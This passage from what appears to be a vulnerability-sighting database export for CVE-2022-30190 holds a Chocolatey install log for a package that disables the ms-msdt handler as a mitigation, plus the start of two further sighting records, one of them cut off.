'Get-WinVerBuild'.\n2026-06-09 18:36:12,165 4968 [INFO ] - VERBOSE: Importing function 'Get-WinVerMajor'.\n2026-06-09 18:36:12,181 4968 [INFO ] - VERBOSE: Importing function 'Get-WinVerMinor'.\n2026-06-09 18:36:12,196 4968 [DEBUG] - Importing 'C:\\ProgramData\\chocolatey\\extensions\\chocolatey-windowsupdate\\chocolatey-windowsupdate.psm1'\n2026-06-09 18:36:12,196 4968 [INFO ] - VERBOSE: Loading module from path 'C:\\ProgramData\\chocolatey\\extensions\\chocolatey-windowsupdate\\chocolatey-windowsupdate.psm1'.\n2026-06-09 18:36:12,384 4968 [INFO ] - VERBOSE: Exporting function 'Install-WindowsUpdate'.\n2026-06-09 18:36:12,400 4968 [INFO ] - VERBOSE: Exporting function 'Test-WindowsUpdate'.\n2026-06-09 18:36:12,400 4968 [INFO ] - VERBOSE: Importing function 'Install-WindowsUpdate'.\n2026-06-09 18:36:12,400 4968 [INFO ] - VERBOSE: Importing function 'Test-WindowsUpdate'.\n2026-06-09 18:36:12,493 4968 [INFO ] - VERBOSE: Exporting function 'Format-FileSize'.\n2026-06-09 18:36:12,493 4968 [INFO ] - VERBOSE: Exporting function 'Get-ChecksumValid'.\n2026-06-09 18:36:12,510 4968 [INFO ] - VERBOSE: Exporting function 'Get-ChocolateyConfigValue'.\n2026-06-09 18:36:12,510 4968 [INFO ] - VERBOSE: Exporting function 'Get-ChocolateyPath'.\n2026-06-09 18:36:12,510 4968 [INFO ] - VERBOSE: Exporting function 'Get-ChocolateyUnzip'.\n2026-06-09 18:36:12,525 4968 [INFO ] - VERBOSE: Exporting function 'Get-ChocolateyWebFile'.\n2026-06-09 18:36:12,525 4968 [INFO ] - VERBOSE: Exporting function 'Get-FtpFile'.\n2026-06-09 18:36:12,525 4968 [INFO ] - VERBOSE: Exporting function 'Get-OSArchitectureWidth'.\n2026-06-09 18:36:12,541 4968 [INFO ] - VERBOSE: Exporting function 'Get-PackageParameters'.\n2026-06-09 18:36:12,541 4968 [INFO ] - VERBOSE: Exporting function 'Get-PackageParametersBuiltIn'.\n2026-06-09 18:36:12,556 4968 [INFO ] - VERBOSE: Exporting function 'Get-ToolsLocation'.\n2026-06-09 18:36:12,556 4968 [INFO ] - VERBOSE: Exporting function 'Get-UACEnabled'.\n2026-06-09 18:36:12,573 4968 [INFO ] - VERBOSE: Exporting function 'Get-UninstallRegistryKey'.\n2026-06-09 18:36:12,573 4968 [INFO ] - VERBOSE: Exporting function 'Get-VirusCheckValid'.\n2026-06-09 18:36:12,588 4968 [INFO ] - VERBOSE: Exporting function 'Get-WebFile'.\n2026-06-09 18:36:12,603 4968 [INFO ] - VERBOSE: Exporting function 'Get-WebFileName'.\n2026-06-09 18:36:12,621 4968 [INFO ] - VERBOSE: Exporting function 'Get-WebHeaders'.\n2026-06-09 18:36:12,636 4968 [INFO ] - VERBOSE: Exporting function 'Install-BinFile'.\n2026-06-09 18:36:12,652 4968 [INFO ] - VERBOSE: Exporting function 'Install-ChocolateyEnvironmentVariable'.\n2026-06-09 18:36:12,666 4968 [INFO ] - VERBOSE: Exporting function 'Install-ChocolateyExplorerMenuItem'.\n2026-06-09 18:36:12,682 4968 [INFO ] - VERBOSE: Exporting function 'Install-ChocolateyFileAssociation'.\n2026-06-09 18:36:12,682 4968 [INFO ] - VERBOSE: Exporting function 'Install-ChocolateyInstallPackage'.\n2026-06-09 18:36:12,698 4968 [INFO ] - VERBOSE: Exporting function 'Install-ChocolateyPackage'.\n2026-06-09 18:36:12,698 4968 [INFO ] - VERBOSE: Exporting function 'Install-ChocolateyPinnedTaskBarItem'.\n2026-06-09 18:36:12,713 4968 [INFO ] - VERBOSE: Exporting function 'Install-ChocolateyPowershellCommand'.\n2026-06-09 18:36:12,713 4968 [INFO ] - VERBOSE: Exporting function 'Install-ChocolateyShortcut'.\n2026-06-09 18:36:12,728 4968 [INFO ] - VERBOSE: Exporting function 'Install-ChocolateyVsixPackage'.\n2026-06-09 18:36:12,728 4968 [INFO ] - VERBOSE: Exporting function 'Install-ChocolateyZipPackage'.\n2026-06-09 18:36:12,743 4968 [INFO ] - VERBOSE: Exporting function 'Install-Vsix'.\n2026-06-09 18:36:12,743 4968 [INFO ] - VERBOSE: Exporting function 'Set-PowerShellExitCode'.\n2026-06-09 18:36:12,760 4968 [INFO ] - VERBOSE: Exporting function 'Start-ChocolateyProcessAsAdmin'.\n2026-06-09 18:36:12,775 4968 [INFO ] - VERBOSE: Exporting function 'Uninstall-BinFile'.\n2026-06-09 18:36:12,852 4968 [INFO ] - VERBOSE: Exporting function 'Uninstall-ChocolateyEnvironmentVariable'.\n2026-06-09 18:36:12,868 4968 [INFO ] - VERBOSE: Exporting function 'Uninstall-ChocolateyPackage'.\n2026-06-09 18:36:12,868 4968 [INFO ] - VERBOSE: Exporting function 'Uninstall-ChocolateyZipPackage'.\n2026-06-09 18:36:12,896 4968 [INFO ] - VERBOSE: Exporting function 'Write-FunctionCallLogMessage'.\n2026-06-09 18:36:12,899 4968 [INFO ] - VERBOSE: Exporting function 'Get-Is32'.\n2026-06-09 18:36:12,919 4968 [INFO ] - VERBOSE: Exporting function 'Get-Is64'.\n2026-06-09 18:36:12,930 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsAMDCPU'.\n2026-06-09 18:36:12,930 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsAMDVideo'.\n2026-06-09 18:36:12,930 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsARMCPU'.\n2026-06-09 18:36:12,949 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsHyperV'.\n2026-06-09 18:36:12,949 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsInDomain'.\n2026-06-09 18:36:12,962 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsIntelCPU'.\n2026-06-09 18:36:12,962 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsIntelVideo'.\n2026-06-09 18:36:12,979 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsKVM'.\n2026-06-09 18:36:12,979 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsMobile'.\n2026-06-09 18:36:12,979 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsNvidiaVideo'.\n2026-06-09 18:36:12,993 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsSSD'.\n2026-06-09 18:36:12,993 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsVirtualBox'.\n2026-06-09 18:36:13,010 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsVM'.\n2026-06-09 18:36:13,010 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsVMware'.\n2026-06-09 18:36:13,010 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWin10'.\n2026-06-09 18:36:13,024 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWin11'.\n2026-06-09 18:36:13,024 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWin7'.\n2026-06-09 18:36:13,041 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWin8'.\n2026-06-09 18:36:13,041 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWin80'.\n2026-06-09 18:36:13,056 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWin81'.\n2026-06-09 18:36:13,056 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWinEdu'.\n2026-06-09 18:36:13,056 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWinEnt'.\n2026-06-09 18:36:13,071 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWinHome'.\n2026-06-09 18:36:13,071 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWinPro'.\n2026-06-09 18:36:13,087 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWinServer'.\n2026-06-09 18:36:13,087 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWinServer2008'.\n2026-06-09 18:36:13,103 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWinServer2008R2'.\n2026-06-09 18:36:13,103 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWinServer2012'.\n2026-06-09 18:36:13,118 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWinServer2012R2'.\n2026-06-09 18:36:13,118 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWinServer2016'.\n2026-06-09 18:36:13,135 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWinServer2019'.\n2026-06-09 18:36:13,135 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWinServer2022'.\n2026-06-09 18:36:13,150 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWinServerDatacenter'.\n2026-06-09 18:36:13,150 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWinServerEssentials'.\n2026-06-09 18:36:13,150 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWinServerFoundation'.\n2026-06-09 18:36:13,166 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWinServerSBS'.\n2026-06-09 18:36:13,166 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWinServerStandard'.\n2026-06-09 18:36:13,180 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWinServerStorage'.\n2026-06-09 18:36:13,180 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWinServerWeb'.\n2026-06-09 18:36:13,197 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWinWorkstation'.\n2026-06-09 18:36:13,197 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsXen'.\n2026-06-09 18:36:13,214 4968 [INFO ] - VERBOSE: Exporting function 'Get-NuspecInfo'.\n2026-06-09 18:36:13,214 4968 [INFO ] - VERBOSE: Exporting function 'Get-PendingReboot'.\n2026-06-09 18:36:13,228 4968 [INFO ] - VERBOSE: Exporting function 'Get-WinName'.\n2026-06-09 18:36:13,228 4968 [INFO ] - VERBOSE: Exporting function 'Get-WinVerBuild'.\n2026-06-09 18:36:13,228 4968 [INFO ] - VERBOSE: Exporting function 'Get-WinVerMajor'.\n2026-06-09 18:36:13,244 4968 [INFO ] - VERBOSE: Exporting function 'Get-WinVerMinor'.\n2026-06-09 18:36:13,259 4968 [INFO ] - VERBOSE: Exporting function 'Install-WindowsUpdate'.\n2026-06-09 18:36:13,259 4968 [INFO ] - VERBOSE: Exporting function 'Test-WindowsUpdate'.\n2026-06-09 18:36:13,274 4968 [INFO ] - VERBOSE: Exporting cmdlet 'Get-EnvironmentVariable'.\n2026-06-09 18:36:13,274 4968 [INFO ] - VERBOSE: Exporting cmdlet 'Get-EnvironmentVariableNames'.\n2026-06-09 18:36:13,291 4968 [INFO ] - VERBOSE: Exporting cmdlet 'Install-ChocolateyPath'.\n2026-06-09 18:36:13,291 4968 [INFO ] - VERBOSE: Exporting cmdlet 'Set-EnvironmentVariable'.\n2026-06-09 18:36:13,308 4968 [INFO ] - VERBOSE: Exporting cmdlet 'Test-ProcessAdminRights'.\n2026-06-09 18:36:13,322 4968 [INFO ] - VERBOSE: Exporting cmdlet 'Uninstall-ChocolateyPath'.\n2026-06-09 18:36:13,322 4968 [INFO ] - VERBOSE: Exporting cmdlet 'Update-SessionEnvironment'.\n2026-06-09 18:36:13,338 4968 [INFO ] - VERBOSE: Exporting cmdlet 'Get-EnvironmentVariable'.\n2026-06-09 18:36:13,338 4968 [INFO ] - VERBOSE: Exporting cmdlet 'Get-EnvironmentVariableNames'.\n2026-06-09 18:36:13,353 4968 [INFO ] - VERBOSE: Exporting cmdlet 'Install-ChocolateyPath'.\n2026-06-09 18:36:13,353 4968 [INFO ] - VERBOSE: Exporting cmdlet 'Set-EnvironmentVariable'.\n2026-06-09 18:36:13,368 4968 [INFO ] - VERBOSE: Exporting cmdlet 'Test-ProcessAdminRights'.\n2026-06-09 18:36:13,368 4968 [INFO ] - VERBOSE: Exporting cmdlet 'Uninstall-ChocolateyPath'.\n2026-06-09 18:36:13,368 4968 [INFO ] - VERBOSE: Exporting cmdlet 'Update-SessionEnvironment'.\n2026-06-09 18:36:13,384 4968 [INFO ] - VERBOSE: Exporting alias 'Get-ProcessorBits'.\n2026-06-09 18:36:13,384 4968 [INFO ] - VERBOSE: Exporting alias 'Get-OSBitness'.\n2026-06-09 18:36:13,400 4968 [INFO ] - VERBOSE: Exporting alias 'Get-InstallRegistryKey'.\n2026-06-09 18:36:13,400 4968 [INFO ] - VERBOSE: Exporting alias 'Generate-BinFile'.\n2026-06-09 18:36:13,417 4968 [INFO ] - VERBOSE: Exporting alias 'Add-BinFile'.\n2026-06-09 18:36:13,417 4968 [INFO ] - VERBOSE: Exporting alias 'Start-ChocolateyProcess'.\n2026-06-09 18:36:13,431 4968 [INFO ] - VERBOSE: Exporting alias 'Invoke-ChocolateyProcess'.\n2026-06-09 18:36:13,431 4968 [INFO ] - VERBOSE: Exporting alias 'Remove-BinFile'.\n2026-06-09 18:36:13,448 4968 [INFO ] - VERBOSE: Exporting alias 'refreshenv'.\n2026-06-09 18:36:13,461 4968 [INFO ] - VERBOSE: Importing cmdlet 'Get-EnvironmentVariable'.\n2026-06-09 18:36:13,461 4968 [INFO ] - VERBOSE: Importing cmdlet 'Get-EnvironmentVariableNames'.\n2026-06-09 18:36:13,477 4968 [INFO ] - VERBOSE: Importing cmdlet 'Install-ChocolateyPath'.\n2026-06-09 18:36:13,477 4968 [INFO ] - VERBOSE: Importing cmdlet 'Set-EnvironmentVariable'.\n2026-06-09 18:36:13,495 4968 [INFO ] - VERBOSE: Importing cmdlet 'Test-ProcessAdminRights'.\n2026-06-09 18:36:13,495 4968 [INFO ] - VERBOSE: Importing cmdlet 'Uninstall-ChocolateyPath'.\n2026-06-09 18:36:13,509 4968 [INFO ] - VERBOSE: Importing cmdlet 'Update-SessionEnvironment'.\n2026-06-09 18:36:13,509 4968 [INFO ] - VERBOSE: Importing function 'Format-FileSize'.\n2026-06-09 18:36:13,525 4968 [INFO ] - VERBOSE: Importing function 'Get-ChecksumValid'.\n2026-06-09 18:36:13,525 4968 [INFO ] - VERBOSE: Importing function 'Get-ChocolateyConfigValue'.\n2026-06-09 18:36:13,525 4968 [INFO ] - VERBOSE: Importing function 'Get-ChocolateyPath'.\n2026-06-09 18:36:13,539 4968 [INFO ] - VERBOSE: Importing function 'Get-ChocolateyUnzip'.\n2026-06-09 18:36:13,539 4968 [INFO ] - VERBOSE: Importing function 'Get-ChocolateyWebFile'.\n2026-06-09 18:36:13,556 4968 [INFO ] - VERBOSE: Importing function 'Get-FtpFile'.\n2026-06-09 18:36:13,556 4968 [INFO ] - VERBOSE: Importing function 'Get-Is32'.\n2026-06-09 18:36:13,556 4968 [INFO ] - VERBOSE: Importing function 'Get-Is64'.\n2026-06-09 18:36:13,572 4968 [INFO ] - VERBOSE: Importing function 'Get-IsAMDCPU'.\n2026-06-09 18:36:13,572 4968 [INFO ] - VERBOSE: Importing function 'Get-IsAMDVideo'.\n2026-06-09 18:36:13,589 4968 [INFO ] - VERBOSE: Importing function 'Get-IsARMCPU'.\n2026-06-09 18:36:13,589 4968 [INFO ] - VERBOSE: Importing function 'Get-IsHyperV'.\n2026-06-09 18:36:13,602 4968 [INFO ] - VERBOSE: Importing function 'Get-IsInDomain'.\n2026-06-09 18:36:13,602 4968 [INFO ] - VERBOSE: Importing function 'Get-IsIntelCPU'.\n2026-06-09 18:36:13,620 4968 [INFO ] - VERBOSE: Importing function 'Get-IsIntelVideo'.\n2026-06-09 18:36:13,620 4968 [INFO ] - VERBOSE: Importing function 'Get-IsKVM'.\n2026-06-09 18:36:13,633 4968 [INFO ] - VERBOSE: Importing function 'Get-IsMobile'.\n2026-06-09 18:36:13,633 4968 [INFO ] - VERBOSE: Importing function 'Get-IsNvidiaVideo'.\n2026-06-09 18:36:13,649 4968 [INFO ] - VERBOSE: Importing function 'Get-IsSSD'.\n2026-06-09 18:36:13,649 4968 [INFO ] - VERBOSE: Importing function 'Get-IsVirtualBox'.\n2026-06-09 18:36:13,665 4968 [INFO ] - VERBOSE: Importing function 'Get-IsVM'.\n2026-06-09 18:36:13,665 4968 [INFO ] - VERBOSE: Importing function 'Get-IsVMware'.\n2026-06-09 18:36:13,681 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWin10'.\n2026-06-09 18:36:13,681 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWin11'.\n2026-06-09 18:36:13,681 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWin7'.\n2026-06-09 18:36:13,698 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWin8'.\n2026-06-09 18:36:13,698 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWin80'.\n2026-06-09 18:36:13,712 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWin81'.\n2026-06-09 18:36:13,712 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWinEdu'.\n2026-06-09 18:36:13,712 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWinEnt'.\n2026-06-09 18:36:13,730 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWinHome'.\n2026-06-09 18:36:13,744 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWinPro'.\n2026-06-09 18:36:13,744 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWinServer'.\n2026-06-09 18:36:13,760 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWinServer2008'.\n2026-06-09 18:36:13,760 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWinServer2008R2'.\n2026-06-09 18:36:13,776 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWinServer2012'.\n2026-06-09 18:36:13,776 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWinServer2012R2'.\n2026-06-09 18:36:13,790 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWinServer2016'.\n2026-06-09 18:36:13,790 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWinServer2019'.\n2026-06-09 18:36:13,808 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWinServer2022'.\n2026-06-09 18:36:13,808 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWinServerDatacenter'.\n2026-06-09 18:36:13,823 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWinServerEssentials'.\n2026-06-09 18:36:13,823 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWinServerFoundation'.\n2026-06-09 18:36:13,837 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWinServerSBS'.\n2026-06-09 18:36:13,837 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWinServerStandard'.\n2026-06-09 18:36:13,852 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWinServerStorage'.\n2026-06-09 18:36:13,852 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWinServerWeb'.\n2026-06-09 18:36:13,852 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWinWorkstation'.\n2026-06-09 18:36:13,869 4968 [INFO ] - VERBOSE: Importing function 'Get-IsXen'.\n2026-06-09 18:36:13,869 4968 [INFO ] - VERBOSE: Importing function 'Get-NuspecInfo'.\n2026-06-09 18:36:13,886 4968 [INFO ] - VERBOSE: Importing function 'Get-OSArchitectureWidth'.\n2026-06-09 18:36:13,900 4968 [INFO ] - VERBOSE: Importing function 'Get-PackageParameters'.\n2026-06-09 18:36:13,900 4968 [INFO ] - VERBOSE: Importing function 'Get-PackageParametersBuiltIn'.\n2026-06-09 18:36:13,917 4968 [INFO ] - VERBOSE: Importing function 'Get-PendingReboot'.\n2026-06-09 18:36:13,917 4968 [INFO ] - VERBOSE: Importing function 'Get-ToolsLocation'.\n2026-06-09 18:36:13,931 4968 [INFO ] - VERBOSE: Importing function 'Get-UACEnabled'.\n2026-06-09 18:36:13,931 4968 [INFO ] - VERBOSE: Importing function 'Get-UninstallRegistryKey'.\n2026-06-09 18:36:13,931 4968 [INFO ] - VERBOSE: Importing function 'Get-VirusCheckValid'.\n2026-06-09 18:36:13,947 4968 [INFO ] - VERBOSE: Importing function 'Get-WebFile'.\n2026-06-09 18:36:13,947 4968 [INFO ] - VERBOSE: Importing function 'Get-WebFileName'.\n2026-06-09 18:36:13,962 4968 [INFO ] - VERBOSE: Importing function 'Get-WebHeaders'.\n2026-06-09 18:36:13,962 4968 [INFO ] - VERBOSE: Importing function 'Get-WinName'.\n2026-06-09 18:36:13,978 4968 [INFO ] - VERBOSE: Importing function 'Get-WinVerBuild'.\n2026-06-09 18:36:13,978 4968 [INFO ] - VERBOSE: Importing function 'Get-WinVerMajor'.\n2026-06-09 18:36:13,978 4968 [INFO ] - VERBOSE: Importing function 'Get-WinVerMinor'.\n2026-06-09 18:36:13,993 4968 [INFO ] - VERBOSE: Importing function 'Install-BinFile'.\n2026-06-09 18:36:13,993 4968 [INFO ] - VERBOSE: Importing function 'Install-ChocolateyEnvironmentVariable'.\n2026-06-09 18:36:14,009 4968 [INFO ] - VERBOSE: Importing function 'Install-ChocolateyExplorerMenuItem'.\n2026-06-09 18:36:14,009 4968 [INFO ] - VERBOSE: Importing function 'Install-ChocolateyFileAssociation'.\n2026-06-09 18:36:14,024 4968 [INFO ] - VERBOSE: Importing function 'Install-ChocolateyInstallPackage'.\n2026-06-09 18:36:14,024 4968 [INFO ] - VERBOSE: Importing function 'Install-ChocolateyPackage'.\n2026-06-09 18:36:14,024 4968 [INFO ] - VERBOSE: Importing function 'Install-ChocolateyPinnedTaskBarItem'.\n2026-06-09 18:36:14,024 4968 [INFO ] - VERBOSE: Importing function 'Install-ChocolateyPowershellCommand'.\n2026-06-09 18:36:14,042 4968 [INFO ] - VERBOSE: Importing function 'Install-ChocolateyShortcut'.\n2026-06-09 18:36:14,042 4968 [INFO ] - VERBOSE: Importing function 'Install-ChocolateyVsixPackage'.\n2026-06-09 18:36:14,042 4968 [INFO ] - VERBOSE: Importing function 'Install-ChocolateyZipPackage'.\n2026-06-09 18:36:14,058 4968 [INFO ] - VERBOSE: Importing function 'Install-Vsix'.\n2026-06-09 18:36:14,058 4968 [INFO ] - VERBOSE: Importing function 'Install-WindowsUpdate'.\n2026-06-09 18:36:14,058 4968 [INFO ] - VERBOSE: Importing function 'Set-PowerShellExitCode'.\n2026-06-09 18:36:14,073 4968 [INFO ] - VERBOSE: Importing function 'Start-ChocolateyProcessAsAdmin'.\n2026-06-09 18:36:14,073 4968 [INFO ] - VERBOSE: Importing function 'Test-WindowsUpdate'.\n2026-06-09 18:36:14,086 4968 [INFO ] - VERBOSE: Importing function 'Uninstall-BinFile'.\n2026-06-09 18:36:14,086 4968 [INFO ] - VERBOSE: Importing function 'Uninstall-ChocolateyEnvironmentVariable'.\n2026-06-09 18:36:14,103 4968 [INFO ] - VERBOSE: Importing function 'Uninstall-ChocolateyPackage'.\n2026-06-09 18:36:14,103 4968 [INFO ] - VERBOSE: Importing function 'Uninstall-ChocolateyZipPackage'.\n2026-06-09 18:36:14,119 4968 [INFO ] - VERBOSE: Importing function 'Write-FunctionCallLogMessage'.\n2026-06-09 18:36:14,119 4968 [INFO ] - VERBOSE: Importing alias 'Add-BinFile'.\n2026-06-09 18:36:14,119 4968 [INFO ] - VERBOSE: Importing alias 'Generate-BinFile'.\n2026-06-09 18:36:14,134 4968 [INFO ] - VERBOSE: Importing alias 'Get-InstallRegistryKey'.\n2026-06-09 18:36:14,134 4968 [INFO ] - VERBOSE: Importing alias 'Get-OSBitness'.\n2026-06-09 18:36:14,134 4968 [INFO ] - VERBOSE: Importing alias 'Get-ProcessorBits'.\n2026-06-09 18:36:14,150 4968 [INFO ] - VERBOSE: Importing alias 'Invoke-ChocolateyProcess'.\n2026-06-09 18:36:14,150 4968 [INFO ] - VERBOSE: Importing alias 'refreshenv'.\n2026-06-09 18:36:14,227 4968 [INFO ] - VERBOSE: Importing alias 'Remove-BinFile'.\n2026-06-09 18:36:14,227 4968 [INFO ] - VERBOSE: Importing alias 'Start-ChocolateyProcess'.\n2026-06-09 18:36:14,399 4968 [DEBUG] - ---------------------------Script Execution---------------------------\n2026-06-09 18:36:14,445 4968 [DEBUG] - Running 'ChocolateyScriptRunner' for disable-ms-msdt v1.0.0 with packageScript 'C:\\ProgramData\\chocolatey\\lib\\disable-ms-msdt\\tools\\ChocolateyInstall.ps1', packageFolder:'C:\\ProgramData\\chocolatey\\lib\\disable-ms-msdt', installArguments: '', packageParameters: '', preRunHookScripts: '', postRunHookScripts: '',\n2026-06-09 18:36:14,555 4968 [DEBUG] - Running package script 'C:\\ProgramData\\chocolatey\\lib\\disable-ms-msdt\\tools\\ChocolateyInstall.ps1'\n2026-06-09 18:36:15,226 4968 [INFO ] - Non-compliant with (CVE-2022-30190) Remove-Item ms-msdt now...\n2026-06-09 18:36:15,258 4968 [INFO ] - Compliant with (CVE-2022-30190)\n2026-06-09 18:36:15,352 4968 [DEBUG] - ----------------------------------------------------------------------\n2026-06-09 18:36:15,367 4968 [DEBUG] - Built-in PowerShell host called with ['[System.Threading.Thread]::CurrentThread.CurrentCulture = '';[System.Threading.Thread]::CurrentThread.CurrentUICulture = '';[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::SystemDefault; & import-module -name 'C:\\ProgramData\\chocolatey\\helpers\\chocolateyInstaller.psm1'; & 'C:\\ProgramData\\chocolatey\\helpers\\chocolateyScriptRunner.ps1' -packageScript 'C:\\ProgramData\\chocolatey\\lib\\disable-ms-msdt\\tools\\ChocolateyInstall.ps1' -installArguments '' -packageParameters '' -preRunHookScripts $null -postRunHookScripts $null'] exited with '0'.\n2026-06-09 18:36:15,383 4968 [DEBUG] - Calling command ['\"C:\\Windows\\System32\\shutdown.exe\" /a']\n2026-06-09 18:36:15,555 4968 [DEBUG] - Command ['\"C:\\Windows\\System32\\shutdown.exe\" /a'] exited with '1116'\n2026-06-09 18:36:15,587 4968 [DEBUG] - Capturing package files in 'C:\\ProgramData\\chocolatey\\lib\\disable-ms-msdt'\n2026-06-09 18:36:15,602 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\disable-ms-msdt\\disable-ms-msdt.nupkg'\n  with checksum '4CC702A61FEC9378C630115B07E6F627'\n2026-06-09 18:36:15,602 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\disable-ms-msdt\\disable-ms-msdt.nuspec'\n  with checksum '684D24B22052135DA170B6044598F834'\n2026-06-09 18:36:15,602 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\disable-ms-msdt\\tools\\backup-ms-msdt.reg'\n  with checksum '500E7E745AAEBC67BE16A511B24CF940'\n2026-06-09 18:36:15,617 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\disable-ms-msdt\\tools\\ChocolateyInstall.ps1'\n  with checksum '904397E10130A2BD49C340A4A8717824'\n2026-06-09 18:36:15,617 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\disable-ms-msdt\\tools\\ChocolateyUninstall.ps1'\n  with checksum '7CDFB5ECBA6740E27035CE20A04A26C6'\n2026-06-09 18:36:15,649 4968 [DEBUG] - Attempting to create directory \"C:\\ProgramData\\chocolatey\\.chocolatey\\disable-ms-msdt.1.0.0\".\n2026-06-09 18:36:15,665 4968 [DEBUG] - There was no original file at 'C:\\ProgramData\\chocolatey\\.chocolatey\\disable-ms-msdt.1.0.0\\.files'\n2026-06-09 18:36:15,696 4968 [DEBUG] - Attempting to delete file \"C:\\ProgramData\\chocolatey\\.chocolatey\\disable-ms-msdt.1.0.0\\.extra\".\n2026-06-09 18:36:15,711 4968 [DEBUG] - Attempting to delete file \"C:\\ProgramData\\chocolatey\\.chocolatey\\disable-ms-msdt.1.0.0\\.version\".\n2026-06-09 18:36:15,711 4968 [DEBUG] - Attempting to delete file \"C:\\ProgramData\\chocolatey\\.chocolatey\\disable-ms-msdt.1.0.0\\.sxs\".\n2026-06-09 18:36:15,711 4968 [DEBUG] - Attempting to delete file \"C:\\ProgramData\\chocolatey\\.chocolatey\\disable-ms-msdt.1.0.0\\.pin\".\n2026-06-09 18:36:15,729 4968 [DEBUG] - Attempting to delete file \"C:\\ProgramData\\chocolatey\\.chocolatey\\disable-ms-msdt.1.0.0\\.deploymentLocation\".\n2026-06-09 18:36:15,774 4968 [DEBUG] - Sending message 'HandlePackageResultCompletedMessage' out if there are subscribers...\n2026-06-09 18:36:15,774 4968 [DEBUG] - Attempting to delete file \"C:\\ProgramData\\chocolatey\\lib\\disable-ms-msdt\\.chocolateyPending\".\n2026-06-09 18:36:15,774 4968 [INFO ] -  The install of disable-ms-msdt was successful.\n2026-06-09 18:36:15,790 4968 [INFO ] -   Software install location not explicitly set, it could be in package or\n  default install location of installer.\n2026-06-09 18:36:15,852 4968 [WARN ] - \nChocolatey installed 2/2 packages. \n See the log for details (C:\\ProgramData\\chocolatey\\logs\\chocolatey.log).\n2026-06-09 18:36:15,869 4968 [DEBUG] - Sending message 'PostRunMessage' out if there are subscribers...\n2026-06-09 18:36:15,869 4968 [DEBUG] - Exiting with 0\n", "creation_timestamp": "2026-06-09T18:36:59.000000Z"}, {"uuid": "d5fb0037-5a4c-426c-8388-94941dd62bba", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://gist.github.com/choco-bot/401a026b524772fda41c0ecb57d92a4c", "content": "", "creation_timestamp": "2026-05-04T17:03:16.000000Z"}, {"uuid": "2d919a70-daf4-4e86-a7e9-5a486a51cffc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": 